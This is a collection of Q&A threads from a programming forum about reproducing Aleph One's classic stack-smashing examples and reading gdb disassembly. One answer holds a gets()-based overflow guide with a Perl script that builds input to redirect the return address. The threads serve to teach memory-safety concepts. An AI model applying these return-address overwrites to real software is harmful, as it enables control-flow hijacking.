I am trying to make the buffer overflow example (example3.c from http://insecure.org/stf/smashstack.html) work on Debian Lenny 2.6. I know that my gcc version and OS version differ from the ones Aleph One used. I have disabled stack protection by compiling with -fno-stack-protector and running sysctl -w kernel.randomize_va_space=0. To account for the differences between my setup and Aleph One's, I introduced two parameters: offset1, the offset from the buffer1 variable to the return address, and offset2, the number of bytes to jump in order to skip a statement. I tried to work out these parameters by analyzing the assembly code but was not successful. So I wrote a shell script that runs the buffer overflow program with every combination of offset1 and offset2 from 1 to 60. Much to my surprise, I am still not able to break this program. It would be great if someone could guide me. I have attached the code and the assembly output for consideration. Sorry for the really long post :)
Thanks.
// Modified example3.c from Aleph One paper - Smashing the stack
void function(int a, int b, int c, int offset1, int offset2) {
char buffer1[5];
char buffer2[10];
int *ret;
ret = (int *)buffer1 + offset1;// how far is return address from buffer ?
(*ret) += offset2; // modify the value of return address
}
int main(int argc, char* argv[]) {
int x;
x = 0;
int offset1 = atoi(argv[1]);
int offset2 = atoi(argv[2]);
function(1,2,3, offset1, offset2);
x = 1; // Goal is to skip this statement using buffer overflow
printf("X : %d\n",x);
return 0;
}
-----------------
#!/bin/bash
# Execute the buffer overflow program with varying offsets
for ((i=1; i<=60; i++))
do
for ((j=1; j<=60; j++))
do
echo "`./test $i $j`"
done
done
-- Assembler output
(gdb) disassemble main
Dump of assembler code for function main:
0x080483c2 <main+0>: lea 0x4(%esp),%ecx
0x080483c6 <main+4>: and $0xfffffff0,%esp
0x080483c9 <main+7>: pushl -0x4(%ecx)
0x080483cc <main+10>: push %ebp
0x080483cd <main+11>: mov %esp,%ebp
0x080483cf <main+13>: push %ecx
0x080483d0 <main+14>: sub $0x24,%esp
0x080483d3 <main+17>: movl $0x0,-0x8(%ebp)
0x080483da <main+24>: movl $0x3,0x8(%esp)
0x080483e2 <main+32>: movl $0x2,0x4(%esp)
0x080483ea <main+40>: movl $0x1,(%esp)
0x080483f1 <main+47>: call 0x80483a4 <function>
0x080483f6 <main+52>: movl $0x1,-0x8(%ebp)
0x080483fd <main+59>: mov -0x8(%ebp),%eax
0x08048400 <main+62>: mov %eax,0x4(%esp)
0x08048404 <main+66>: movl $0x80484e0,(%esp)
0x0804840b <main+73>: call 0x80482d8 <printf@plt>
0x08048410 <main+78>: mov $0x0,%eax
0x08048415 <main+83>: add $0x24,%esp
0x08048418 <main+86>: pop %ecx
0x08048419 <main+87>: pop %ebp
0x0804841a <main+88>: lea -0x4(%ecx),%esp
0x0804841d <main+91>: ret
End of assembler dump.
(gdb) disassemble function
Dump of assembler code for function function:
0x080483a4 <function+0>: push %ebp
0x080483a5 <function+1>: mov %esp,%ebp
0x080483a7 <function+3>: sub $0x20,%esp
0x080483aa <function+6>: lea -0x9(%ebp),%eax
0x080483ad <function+9>: add $0x30,%eax
0x080483b0 <function+12>: mov %eax,-0x4(%ebp)
0x080483b3 <function+15>: mov -0x4(%ebp),%eax
0x080483b6 <function+18>: mov (%eax),%eax
0x080483b8 <function+20>: lea 0x7(%eax),%edx
0x080483bb <function+23>: mov -0x4(%ebp),%eax
0x080483be <function+26>: mov %edx,(%eax)
0x080483c0 <function+28>: leave
0x080483c1 <function+29>: ret
End of assembler dump.
The disassembly of function that you provided seems to use hard-coded values for offset1 and offset2, contrary to your C code.
The address for ret should be calculated using byte/char offsets: ret = (int *)(buffer1 + offset1), otherwise you'll get hit by pointer math (especially in this case, when your buffer1 is not at a nice aligned offset from the return address).
offset1 should be equal to 0x9 + 0x4 (the offset used in lea + 4 bytes for the push %ebp). However, this can change unpredictably each time you compile - the stack layout might be different, the compiler might create some additional stack alignment, etc.
offset2 should be equal to 7 (the length of the instruction you're trying to skip).
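To make the pointer-math point concrete, here is a minimal sketch (the helper names are made up for illustration, and it only measures distances, it does not touch any return address). It shows how far a pointer moves when the offset is applied to an int pointer versus a char pointer:

```c
#include <stddef.h>

/* Bytes moved when n is added to an int pointer: n is scaled by sizeof(int).
 * n must be between 0 and 16 so the pointer stays inside the array. */
ptrdiff_t bytes_moved_as_int(int n)
{
    int words[16] = {0};
    return (char *)(words + n) - (char *)words;
}

/* Bytes moved when n is added to a char pointer: exactly n.
 * n must be between 0 and 64 so the pointer stays inside the array. */
ptrdiff_t bytes_moved_as_char(int n)
{
    char bytes[64] = {0};
    return (bytes + n) - bytes;
}
```

With 4-byte ints, bytes_moved_as_int(13) is 52 while bytes_moved_as_char(13) is 13, which is why (int *)buffer1 + offset1 lands far beyond the spot that (int *)(buffer1 + offset1) reaches.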
Note that you're getting a little lucky here - the function uses the cdecl calling convention, which means the caller is responsible for removing arguments off the stack after returning from the function, which normally looks like this:
push arg3
push arg2
push arg1
call func
add esp, 0Ch ; remove as many bytes as were used by the pushed arguments
Your compiler chose to combine this correction with the one after printf, but it could also decide to do this after your function call. In this case the add esp, <number> instruction would be present between your return address and the instruction you want to skip - you can probably imagine that this would not end well.
I am following this buffer overflow tutorial: https://insecure.org/stf/smashstack.html
I want to make this program work in Windows
#include <stdio.h>
void f(int x, int y)
{
char buffer1[5];
char buffer2[10];
int *ret = buffer1 + 12;
(*ret) += 7;
}
int main()
{
int x;
x = 10;
f(1, 2);
x = 21;
printf("%d\n", x);
return 0;
}
This program attempts to modify the return address of function f so that this line x = 21; is ignored in main (ie. the program jumps directly to executing printf).
For some reason this trivial buffer overflow attack didn't work in Windows and I am not sure why.
This is how I understand the stack layout after the function f is called in x64 machines
high address
...
return address (4 bytes)
saved frame pointer (4 bytes)
1 (first argument for f; 4 bytes)
2 (second argument for f; 4 bytes)
buffer1 (1*8=8 bytes)
buffer2 (1*12=12 bytes)
...
low address
Using gdb, I get the following disassembly
Dump of assembler code for function main:
0x0000000000401590 <+0>: push %rbp
0x0000000000401591 <+1>: mov %rsp,%rbp
0x0000000000401594 <+4>: sub $0x30,%rsp
0x0000000000401598 <+8>: callq 0x401690 <__main>
0x000000000040159d <+13>: movl $0xa,-0x4(%rbp)
0x00000000004015a4 <+20>: mov $0x2,%edx
0x00000000004015a9 <+25>: mov $0x1,%ecx
0x00000000004015ae <+30>: callq 0x401560 <f>
0x00000000004015b3 <+35>: movl $0x15,-0x4(%rbp)
0x00000000004015ba <+42>: mov -0x4(%rbp),%eax
0x00000000004015bd <+45>: mov %eax,%edx
0x00000000004015bf <+47>: lea 0x2a3a(%rip),%rcx # 0x404000
0x00000000004015c6 <+54>: callq 0x402b70 <printf>
0x00000000004015cb <+59>: mov $0x0,%eax
0x00000000004015d0 <+64>: add $0x30,%rsp
0x00000000004015d4 <+68>: pop %rbp
0x00000000004015d5 <+69>: retq
End of assembler dump.
So in order to get return address in the stack, I must add 4+4+4=12 bytes. From the disassembly, in order to skip x = 21;, I must skip movl $0x15,-0x4(%rbp). So I need to add the additional 42-35=7 bytes to the return address.
Is there anything wrong with my understanding so far?
I am currently working with gdb disassembly to understand a C program in more detail, so I wrote this C program:
#include <stdio.h>
void swap(int a, int b){
int temp = a;
a = b;
b = temp;
}
void main(){
int a = 1,b = 2;
swap(a, b);
}
I use gdb and run disass /m main to get those:
(gdb) disass /m main
Dump of assembler code for function main:
8 void main(){
0x0000000000400492 <+0>: push %rbp
0x0000000000400493 <+1>: mov %rsp,%rbp
0x0000000000400496 <+4>: sub $0x10,%rsp
9 int a = 1,b = 2;
0x000000000040049a <+8>: movl $0x1,-0x8(%rbp)
0x00000000004004a1 <+15>: movl $0x2,-0x4(%rbp)
10 swap(a, b);
0x00000000004004a8 <+22>: mov -0x4(%rbp),%edx
0x00000000004004ab <+25>: mov -0x8(%rbp),%eax
0x00000000004004ae <+28>: mov %edx,%esi
0x00000000004004b0 <+30>: mov %eax,%edi
0x00000000004004b2 <+32>: callq 0x400474 <swap>
11 }
0x00000000004004b7 <+37>: leaveq
0x00000000004004b8 <+38>: retq
End of assembler dump.
My question is: what does -0x8(%rbp) mean?
Is it memory or a register?
I do know that 1 is stored in -0x8(%rbp) and 2 in -0x4(%rbp). How can I show the value stored in that kind of 'place'?
I tried (gdb) p -0x8(%rbp) but got this:
A syntax error in expression, near `%rbp)'.
Registers in gdb can be referred with the prefix '$'
p *(int *)($rbp - 8)
RBP and RSP most likely hold memory addresses, specifically addresses on the stack. The other registers are more or less general-purpose registers and can point to memory too.
It means "the data stored at the address you get by subtracting eight from the address stored in rbp". Try looking at the stack commands available in gdb: http://www.delorie.com/gnu/docs/gdb/gdb_41.html
The actual meaning of an operand such as -0x8(%rbp) depends on the architecture (or the assembly language). In this case, -0x8(%rbp) refers to memory at the address given by the value of %rbp minus 8.
In gdb, you can print the value at that memory address by doing something like
info r rbp
p *(int *)(value_of_rbp - 8)
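The same idea can be sketched in C. This is only an illustration under stated assumptions: effective_address and load_int are hypothetical helper names, and the "register value" is just an integer holding an address that the caller supplies. The operand disp(%reg) names the memory at register value plus displacement:

```c
#include <stdint.h>
#include <string.h>

/* Address named by disp(%reg): the register value plus a signed displacement. */
uintptr_t effective_address(uintptr_t base, intptr_t disp)
{
    return base + (uintptr_t)disp;
}

/* Read the int stored at disp(%reg), similar in spirit to
 * gdb's  p *(int *)($rbp - 8). */
int load_int(uintptr_t base, intptr_t disp)
{
    int value;
    memcpy(&value, (const void *)effective_address(base, disp), sizeof value);
    return value;
}
```

If base stands in for %rbp and the two ints just below it hold 1 and 2, load_int(base, -8) returns 1 and load_int(base, -4) returns 2 on a machine with 4-byte ints, matching the movl instructions in the disassembly above.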
I am trying to reproduce the stack overflow results from Aleph One's article "Smashing the Stack for Fun and Profit" (available here: http://insecure.org/stf/smashstack.html).
Trying to overwrite the return address doesn't seem to work for me.
C code:
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
int *ret;
//Trying to overwrite return address
ret = buffer1 + 12;
(*ret) = 0x4005da;
}
void main() {
int x;
x = 0;
function(1,2,3);
x = 1;
printf("%d\n",x);
}
disassembled main:
(gdb) disassemble main
Dump of assembler code for function main:
0x00000000004005b0 <+0>: push %rbp
0x00000000004005b1 <+1>: mov %rsp,%rbp
0x00000000004005b4 <+4>: sub $0x10,%rsp
0x00000000004005b8 <+8>: movl $0x0,-0x4(%rbp)
0x00000000004005bf <+15>: mov $0x3,%edx
0x00000000004005c4 <+20>: mov $0x2,%esi
0x00000000004005c9 <+25>: mov $0x1,%edi
0x00000000004005ce <+30>: callq 0x400564 <function>
0x00000000004005d3 <+35>: movl $0x1,-0x4(%rbp)
0x00000000004005da <+42>: mov -0x4(%rbp),%eax
0x00000000004005dd <+45>: mov %eax,%esi
0x00000000004005df <+47>: mov $0x4006dc,%edi
0x00000000004005e4 <+52>: mov $0x0,%eax
0x00000000004005e9 <+57>: callq 0x400450 <printf@plt>
0x00000000004005ee <+62>: leaveq
0x00000000004005ef <+63>: retq
End of assembler dump.
I have hard-coded the return address to skip the x = 1; line, using a value taken from the disassembly (address 0x4005da). The intent of this exploit is to print 0, but it prints 1 instead.
I have a very strong feeling that "ret = buffer1 + 12;" does not point at the return address. If that is the case, how can I determine where the return address is? Is gcc allocating more memory between the return address and the buffer?
Here's a guide I wrote for a friend a while back on performing a buffer overflow attack using gets. It goes over how to get the return address and how to use it to write over the old one:
Our knowledge of the stack tells us that the return address appears on the stack after the buffer you're trying to overflow. However, how far after the buffer the return address appears depends on the architecture you're using. In order to determine this, first write a simple program and inspect the assembly:
C code:
void function()
{
char buffer[4];
}
int main()
{
function();
}
Assembly (abridged):
function:
pushl %ebp
movl %esp, %ebp
subl $16, %esp
leave
ret
main:
leal 4(%esp), %ecx
andl $-16, %esp
pushl -4(%ecx)
pushl %ebp
movl %esp, %ebp
pushl %ecx
call function
...
There are several tools that you can use to inspect the assembly code. First, of course, is compiling straight to assembly output from gcc using gcc -S main.c. This can be difficult to read since there are few or no hints about which code corresponds to the original C code. Additionally, there is a lot of boilerplate code that can be difficult to sift through. Another tool to consider is gdbtui. The benefit of using gdbtui is that you can inspect the assembly source while running the program and manually inspect the stack throughout the execution of the program. However, it has a steep learning curve.
The assembly inspection program that I like best is objdump. Running objdump -dS a.out gives the assembly source with the context from the original C source code. Using objdump, on my computer the offset of the return address from the character buffer is 8 bytes.
The function function in the example below takes the return address and adds 7 to it. The instruction that the return address originally pointed to is 7 bytes long, so adding 7 makes the return address point to the instruction immediately after the assignment.
In the example below, I overwrite the return address to skip the instruction x = 1.
simple C program:
void function()
{
char buffer[4];
/* return address is 8 bytes beyond the start of the buffer */
int *ret = buffer + 8;
/* assignment instruction we want to skip is 7 bytes long */
(*ret) += 7;
}
int main()
{
int x = 0;
function();
x = 1;
printf("%d\n",x);
}
Main function (x = 1 at 80483af is seven bytes long):
8048392: 8d4c2404 lea 0x4(%esp),%ecx
8048396: 83e4f0 and $0xfffffff0,%esp
8048399: ff71fc pushl -0x4(%ecx)
804839c: 55 push %ebp
804839d: 89e5 mov %esp,%ebp
804839f: 51 push %ecx
80483a0: 83ec24 sub $0x24,%esp
80483a3: c745f800000000 movl $0x0,-0x8(%ebp)
80483aa: e8c5ffffff call 8048374 <function>
80483af: c745f801000000 movl $0x1,-0x8(%ebp)
80483b6: 8b45f8 mov -0x8(%ebp),%eax
80483b9: 89442404 mov %eax,0x4(%esp)
80483bd: c70424a0840408 movl $0x80484a0,(%esp)
80483c4: e80fffffff call 80482d8 <printf@plt>
80483c9: 83c424 add $0x24,%esp
80483cc: 59 pop %ecx
80483cd: 5d pop %ebp
We know where the return address is and we have demonstrated that changing it can affect the code that is run. A buffer overflow can do the same thing by using gets and inputting the right character string so that the return address is overwritten with a new address.
In a new example below we have a function function which has a buffer filled using gets. We also have a function uncalled which never gets called. With the correct input, we can run uncalled.
#include <stdio.h>
#include <stdlib.h>
void uncalled()
{
puts("uh oh!");
exit(1);
}
void function()
{
char buffer[4];
gets(buffer);
}
int main()
{
function();
puts("program secure");
}
To run uncalled, inspect the executable using objdump or similar to find the address of the entry point of uncalled. Then append the address to the input buffer in the right place so that it overwrites the old return address. If your computer is little-endian (x86, etc.), you need to swap the endianness of the address.
In order to do this correctly, I have a simple perl script below, which generates the input that will cause the buffer overflow that will overwrite the return address. It takes two arguments, first it takes the new return address, and second it takes the distance (in bytes) from the beginning of the buffer to the return address location.
#!/usr/bin/perl
print "x" x $ARGV[1]; # fill the buffer
print scalar reverse pack "H*", substr("0" x 8 . $ARGV[0], -8); # swap endian of input
print "\n"; # new line to end gets
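For readers who prefer C over Perl, the same input can be produced with a small helper. This is a sketch under assumptions: build_payload is a hypothetical name, the target is a 32-bit little-endian machine, and the address is passed as a number rather than as a hex string:

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Writes `pad` filler bytes, then `addr` as 4 little-endian bytes, then a
 * newline to end gets. Returns the payload length, or 0 if `out` is too small. */
size_t build_payload(unsigned char *out, size_t out_size, size_t pad, uint32_t addr)
{
    size_t total = pad + 4 + 1;
    if (total < pad || total > out_size)
        return 0;
    memset(out, 'x', pad);                          /* fill the buffer */
    for (int i = 0; i < 4; i++)                     /* lowest byte first */
        out[pad + i] = (unsigned char)(addr >> (8 * i));
    out[pad + 4] = '\n';
    return total;
}
```

The result can be written to stdout with fwrite and piped into the vulnerable program. Note that gets stops reading at a newline, so an address that contains the byte 0x0a cannot be delivered this way.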
You need to examine the stack to determine if buffer1+12 is actually the right address to be modifying. This sort of stuff isn't exactly very portable.
I'd probably also place some eye catchers in the code so you can see where the buffers are on the stack in relation to the return address:
char buffer1[5] = "1111";
char buffer2[10] = "2222";
You can figure this out by printing out the stack. Add code like this:
int* pESP;
__asm mov pESP, esp
The __asm directive is Visual Studio specific. Once you have the address of the stack you can print it out and see what is in there. Note that the stack will change when you do things or make calls, so you have to save the whole block of memory at once by first copying the memory at the stack address to an array, then you print out the array.
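The copy-first, print-later approach might look like the sketch below. The helper names are hypothetical, and reading stack memory outside your own variables is undefined behaviour in standard C, so treat this as a debugging aid for a specific compiler rather than portable code:

```c
#include <stdio.h>
#include <string.h>

/* Copy `count` bytes starting at `start` in one step, so that later calls
 * (such as printf) cannot change what ends up being printed. */
void snapshot_bytes(const void *start, unsigned char *out, size_t count)
{
    memcpy(out, start, count);
}

/* Print a snapshot as hex, 16 bytes per line. */
void print_snapshot(const unsigned char *snap, size_t count)
{
    for (size_t i = 0; i < count; i++)
        printf("%02x%c", snap[i], (i % 16 == 15 || i + 1 == count) ? '\n' : ' ');
}
```

You would call snapshot_bytes with the saved stack address first, and only then call print_snapshot on the copy.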
What you will find is all kinds of garbage having to do with the stack frame and various runtime checks. By default VS will put guard code in the stack to prevent exactly what you are trying to do. If you print out the assembly listing for "function" you will see this. You need to set compiler switches to turn all this stuff off.
As an alternative to the methods suggested in other answers, you can figure this sort of thing out using gdb. To make the output a bit easier to read, I removed the buffer2 variable and changed buffer1 to 8 bytes so things are more aligned. We will also compile in 32-bit mode to make the addresses easier to read, and turn debugging on (gcc -m32 -g).
void function(int a, int b, int c) {
char buffer1[8];
char *ret;
so let's print the address of buffer1:
(gdb) print &buffer1
$1 = (char (*)[8]) 0xbffffa40
then let's print a bit past that and see what's on the stack.
(gdb) x/16x 0xbffffa40
0xbffffa40: 0x00001000 0x00000000 0xfecf25c3 0x00000003
0xbffffa50: 0x00000000 0xbffffb50 0xbffffa88 0x00001f3b
0xbffffa60: 0x00000001 0x00000002 0x00000003 0x00000000
0xbffffa70: 0x00000003 0x00000002 0x00000001 0x00001efc
Do a backtrace to see where the return address should be pointing:
(gdb) bt
#0 function (a=1, b=2, c=3) at foo.c:18
#1 0x00001f3b in main () at foo.c:26
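and sure enough, there it is: 0x00001f3b is the last word of the 0xbffffa50 row, i.e. at 0xbffffa5c. (The dump below starts one byte earlier, at 0xbffffa5b, so the value appears shifted by one byte.)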
(gdb) x/x 0xbffffa5b
0xbffffa5b: 0x001f3bbf
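The search through the dump can also be done mechanically. The sketch below uses a hypothetical helper, find_word_offset, and assumes the words have been copied out of the x/16x output into an array; it reports how many bytes past the start of the dump the return address sits:

```c
#include <stddef.h>
#include <stdint.h>

/* Returns the byte offset of the first word equal to `target`,
 * or -1 if the value does not appear in the dump. */
long find_word_offset(const uint32_t *words, size_t count, uint32_t target)
{
    for (size_t i = 0; i < count; i++)
        if (words[i] == target)
            return (long)(i * sizeof words[0]);
    return -1;
}
```

For the dump above, searching for 0x00001f3b (the return address shown by bt) gives an offset of 28 bytes from buffer1, i.e. address 0xbffffa40 + 28 = 0xbffffa5c.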
The code below is from the well-known article Smashing The Stack For Fun And Profit.
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
int *ret;
ret = buffer1 + 12;
(*ret)+=8;
}
void main() {
int x;
x=0;
function(1,2,3);
x=1;
printf("%d\n",x);
}
I think I should explain what I want this code to do.
The stack model is below. The number under each name is the number of bytes that item occupies on the stack. To rewrite RET and skip the statement, I calculate the offset from buffer1 to RET as 8+4=12, since the architecture is x86 Linux.
buffer2 buffer1 BSP RET a b c
(12) (8) (4) (4) (4) (4) (4)
I want to skip the statement x=1; and let printf() output 0 on the screen.
I compile the code with:
gcc stack2.c -g
and run it in gdb:
gdb ./a.out
gdb gives me the result like this:
Program received signal SIGSEGV, Segmentation fault.
main () at stack2.c:17
17 x = 1;
I think Linux uses some mechanism to protect against stack overflow. Maybe Linux stores the RET address in another place and compares the RET address in the stack before functions return.
What are the details of that mechanism? How should I rewrite the code to make the program output 0?
OK, the disassembly is below. It comes from the output of gdb, since I think that is easier for you to read. Also, can anybody tell me how to paste a long code sequence? Copying and pasting it piece by piece is tiring...
Dump of assembler code for function main:
0x08048402 <+0>: push %ebp
0x08048403 <+1>: mov %esp,%ebp
0x08048405 <+3>: sub $0x10,%esp
0x08048408 <+6>: movl $0x0,-0x4(%ebp)
0x0804840f <+13>: movl $0x3,0x8(%esp)
0x08048417 <+21>: movl $0x2,0x4(%esp)
0x0804841f <+29>: movl $0x1,(%esp)
0x08048426 <+36>: call 0x80483e4 <function>
0x0804842b <+41>: movl $0x1,-0x4(%ebp)
0x08048432 <+48>: mov $0x8048520,%eax
0x08048437 <+53>: mov -0x4(%ebp),%edx
0x0804843a <+56>: mov %edx,0x4(%esp)
0x0804843e <+60>: mov %eax,(%esp)
0x08048441 <+63>: call 0x804831c <printf@plt>
0x08048446 <+68>: mov $0x0,%eax
0x0804844b <+73>: leave
0x0804844c <+74>: ret
Dump of assembler code for function function:
0x080483e4 <+0>: push %ebp
0x080483e5 <+1>: mov %esp,%ebp
0x080483e7 <+3>: sub $0x14,%esp
0x080483ea <+6>: lea -0x9(%ebp),%eax
0x080483ed <+9>: add $0x3,%eax
0x080483f0 <+12>: mov %eax,-0x4(%ebp)
0x080483f3 <+15>: mov -0x4(%ebp),%eax
0x080483f6 <+18>: mov (%eax),%eax
0x080483f8 <+20>: lea 0x8(%eax),%edx
0x080483fb <+23>: mov -0x4(%ebp),%eax
0x080483fe <+26>: mov %edx,(%eax)
0x08048400 <+28>: leave
0x08048401 <+29>: ret
I checked the assembly code and found a mistake in my program: I have changed (*ret)+=8 to (*ret)+=7, since 0x08048432 <+48> minus 0x0804842b <+41> is 7.
Because that article is from 1996 and the assumptions are incorrect.
Refer to "Smashing The Modern Stack For Fun And Profit"
http://www.ethicalhacker.net/content/view/122/24/
From the above link:
However, the GNU C Compiler (gcc) has evolved since 1998, and as a result, many people are left wondering why they can't get the examples to work for them, or if they do get the code to work, why they had to make the changes that they did.
The function function overwrites some place on the stack outside of its own frame, which in this case is the stack of main. What it overwrites I don't know, but it causes the segmentation fault you see. It might be some protection employed by the operating system, but it might as well be that the generated code just does something wrong when the wrong value is at that position on the stack.
This is a really good example of what may happen when you write outside of your allocated memory. It might crash directly, it might crash somewhere completely different, or it might not crash at all but instead just do some calculation wrong.
Try ret = buffer1 + 3;
Explanation: ret is an integer pointer; incrementing it by 1 adds 4 bytes to the address on 32bit machines.
I need your help. Here is the source code of my program. I need to understand what manipulations are being done by the score1, score2, score3 and score4 functions.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <pwd.h>
#include <unistd.h>

#include "score.h"

int main(int argc, char *argv[])
{
int i, j, k, l, s;
struct passwd *pw;
char cmd[1024];

/* Make sure that we have exactly 5 arguments: the name of the executable, and 4 numbers */
if (argc != 5) {
printf("Usage: %s i j k l\n where i,j,k,l are integers.\n Try to get as high a score as you can.\n", argv[0]);
exit(8);
}

initialize();

/* Convert the inputs to ints */
i = atoi(argv[1]);
j = atoi(argv[2]);
k = atoi(argv[3]);
l = atoi(argv[4]);

printf("You entered the integers %d, %d, %d, and %d.\n", i, j, k, l);
s = score1(i) + score2(j) + score3(k) + score4(l);

printf("Your score is %d.\n", s);
if (s > 0) {
pw = getpwuid(getuid());

printf("Thank you!\n");
system(cmd);
I have started disassembling the code as follows:
(gdb) disas score1
Dump of assembler code for function score1:
0x080488b0 <score1+0>: push %ebp
0x080488b1 <score1+1>: mov %esp,%ebp
0x080488b3 <score1+3>: cmpl $0xe1e4,0x8(%ebp)
0x080488ba <score1+10>: setne %al
0x080488bd <score1+13>: movzbl %al,%eax
0x080488c0 <score1+16>: sub $0x1,%eax
0x080488c3 <score1+19>: and $0xa,%eax
0x080488c6 <score1+22>: pop %ebp
0x080488c7 <score1+23>: ret
(gdb) disas score2
Dump of assembler code for function score2:
0x080488c8 <score2+0>: push %ebp
0x080488c9 <score2+1>: mov %esp,%ebp
0x080488cb <score2+3>: mov 0x8049f88,%eax
0x080488d0 <score2+8>: sub $0x2,%eax
0x080488d3 <score2+11>: mov %eax,0x8049f88
0x080488d8 <score2+16>: cmp 0x8(%ebp),%eax
0x080488db <score2+19>: setne %al
0x080488de <score2+22>: movzbl %al,%eax
0x080488e1 <score2+25>: sub $0x1,%eax
0x080488e4 <score2+28>: and $0xa,%eax
0x080488e7 <score2+31>: pop %ebp
0x080488e8 <score2+32>: ret
(gdb) disas score3
Dump of assembler code for function score3:
0x080488e9 <score3+0>: push %ebp
0x080488ea <score3+1>: mov %esp,%ebp
0x080488ec <score3+3>: mov 0x8(%ebp),%eax
0x080488ef <score3+6>: and $0xf,%eax
0x080488f2 <score3+9>: mov 0x8048e00(,%eax,4),%eax
0x080488f9 <score3+16>: pop %ebp
0x080488fa <score3+17>: ret
(gdb) disas score4
Dump of assembler code for function score4:
0x080488fb <score4+0>: push %ebp
0x080488fc <score4+1>: mov %esp,%ebp
0x080488fe <score4+3>: push %ebx
0x080488ff <score4+4>: mov 0x8(%ebp),%eax
0x08048902 <score4+7>: movzwl %ax,%edx
0x08048905 <score4+10>: mov %eax,%ecx
0x08048907 <score4+12>: shr $0x10,%ecx
0x0804890a <score4+15>: lea 0x0(,%edx,8),%eax
0x08048911 <score4+22>: sub %edx,%eax
0x08048913 <score4+24>: cmp %ecx,%eax
0x08048915 <score4+26>: jne 0x8048920 <score4+37>
0x08048917 <score4+28>: mov $0x8000ffff,%ebx
0x0804891c <score4+33>: test %edx,%ecx
0x0804891e <score4+35>: jne 0x8048940 <score4+69>
0x08048920 <score4+37>: mov %ecx,%eax
0x08048922 <score4+39>: xor %edx,%eax
0x08048924 <score4+41>: cmp $0xf00f,%eax
0x08048929 <score4+46>: jne 0x804893b <score4+64>
0x0804892b <score4+48>: mov %ecx,%eax
0x0804892d <score4+50>: or %edx,%eax
0x0804892f <score4+52>: mov $0xa,%ebx
0x08048934 <score4+57>: cmp $0xf42f,%eax
0x08048939 <score4+62>: je 0x8048940 <score4+69>
0x0804893b <score4+64>: mov $0x0,%ebx
0x08048940 <score4+69>: mov %ebx,%eax
0x08048942 <score4+71>: pop %ebx
0x08048943 <score4+72>: pop %ebp
0x08048944 <score4+73>: ret
I've started examining score2.
What I have done is:
(gdb) x 0x8049f88
0x8049f88 <secret>: "Чй"
(gdb) disas 0x8049f88
Dump of assembler code for function secret:
0x08049f88 <secret+0>: dec %dl
0x08049f8a <secret+2>: add %al,(%eax)
End of assembler dump.
And I'm lost here.
Here's what I think happens so far (See comments):
(gdb) disas score2
Dump of assembler code for function score2:
0x080488c8 <score2+0>: push %ebp
0x080488c9 <score2+1>: mov %esp,%ebp 'Copy %esp into %ebp
0x080488cb <score2+3>: mov 0x8049f88,%eax 'executing: decrement and add
0x080488d0 <score2+8>: sub $0x2,%eax ' subtract $0x2 from %eax (How can I figure out what $0x2
0x080488d3 <score2+11>: mov %eax,0x8049f88 'Have no idea what this does
0x080488d8 <score2+16>: cmp 0x8(%ebp),%eax compare of %ebp to %eax (why %ebp has 0x8 preceding it?)
0x080488db <score2+19>: setne %al 'I have no idea what this does
0x080488de <score2+22>: movzbl %al,%eax
0x080488e1 <score2+25>: sub $0x1,%eax
0x080488e4 <score2+28>: and $0xa,%eax
0x080488e7 <score2+31>: pop %ebp
0x080488e8 <score2+32>: ret
If you could help me understand what kind of transformation score2 applies to an integer, and which gdb commands could help me, I would really appreciate it, and I would try to figure out the rest (score1-3) by myself. I'm just lost here.
There are really only 2 things you need to know to understand a disassembly. The first is all the instructions and addressing modes supported by the CPU and how they work. The second is the syntax used by the assembler/disassembler. Without being familiar with both of these things you will get nowhere.
For an example of "you will get nowhere", here's score2:
0x080488c8 <score2+0>: push %ebp ;Save EBP
0x080488c9 <score2+1>: mov %esp,%ebp ;EBP = address of stack frame
0x080488cb <score2+3>: mov 0x8049f88,%eax ;EAX = the data at address 0x8049f88
0x080488d0 <score2+8>: sub $0x2,%eax ;EAX = EAX - 2
0x080488d3 <score2+11>: mov %eax,0x8049f88 ;The value at address 0x8049f88 = eax
0x080488d8 <score2+16>: cmp 0x8(%ebp),%eax ;Compare the int at offset 8 in the stack frame with EAX
0x080488db <score2+19>: setne %al ;If the int at offset 8 in the stack frame wasn't equal to EAX, set AL to 1, otherwise set AL to 0
0x080488de <score2+22>: movzbl %al,%eax ;Zero-extend AL to EAX (so EAX = 0 or 1)
0x080488e1 <score2+25>: sub $0x1,%eax ;Decrease EAX (so EAX = -1 or 0)
0x080488e4 <score2+28>: and $0xa,%eax ;EAX = EAX AND 0x0A (so EAX = 0xA or 0)
0x080488e7 <score2+31>: pop %ebp ;Restore previous EBP
0x080488e8 <score2+32>: ret ;Return
Converting back into C, this might look something like:
int score2(int something) {
some_global_int -= 2;
if(some_global_int == something) return 0x0A;
else return 0;
}
Of course I only slapped this together in 5 minutes, and haven't double checked anything or tested anything, so it could be wrong.
After reading the above "score2" code, are you any closer to understanding the disassembly of any of the other functions?
Based on your initial attempt at commenting score2, you should either ask someone to do all the work for you (and learn nothing, and have no way of knowing if that person is right or wrong), or ask for the best place to learn 80x86 assembly (and AT&T syntax).
I'm assuming you're given some kind of compiled library with the score functions in it, and you're trying to reverse engineer it as some kind of homework project. In that case, I suggest you start familiarizing yourself with the standard C calling convention cdecl.
Basically, esp points to the stack, on which the arguments to the function are pushed before it's called, so a C function first moves esp into ebp and then it can access the arguments by adding offsets to ebp and dereferencing the resulting address (for example, 0x8(%ebp) is the first argument). It uses ebp for this purpose so it can still modify esp in order to add more local variables on the stack without losing track of where the arguments are stored.
Anyway, here's an overview of score2 to help get you started:
(gdb) disas score2
Dump of assembler code for function score2:
0x080488c8 <score2+0>: push %ebp
0x080488c9 <score2+1>: mov %esp,%ebp ; This just saves a copy of the top of our stack to read arguments with
0x080488cb <score2+3>: mov 0x8049f88,%eax ; Load a value from a memory location (the number is a memory address, probably to a global variable)
0x080488d0 <score2+8>: sub $0x2,%eax ; Subtract 2
0x080488d3 <score2+11>: mov %eax,0x8049f88 ; Store the new value into the same memory location
0x080488d8 <score2+16>: cmp 0x8(%ebp),%eax ; Compare the first argument of the function to that value
0x080488db <score2+19>: setne %al ; Sets the lower byte of eax to 1 if they don't match
0x080488de <score2+22>: movzbl %al,%eax ; Zero-extends al into eax, clearing the upper bytes so eax is just 1 or 0 now
0x080488e1 <score2+25>: sub $0x1,%eax ; Subtract 1 from eax
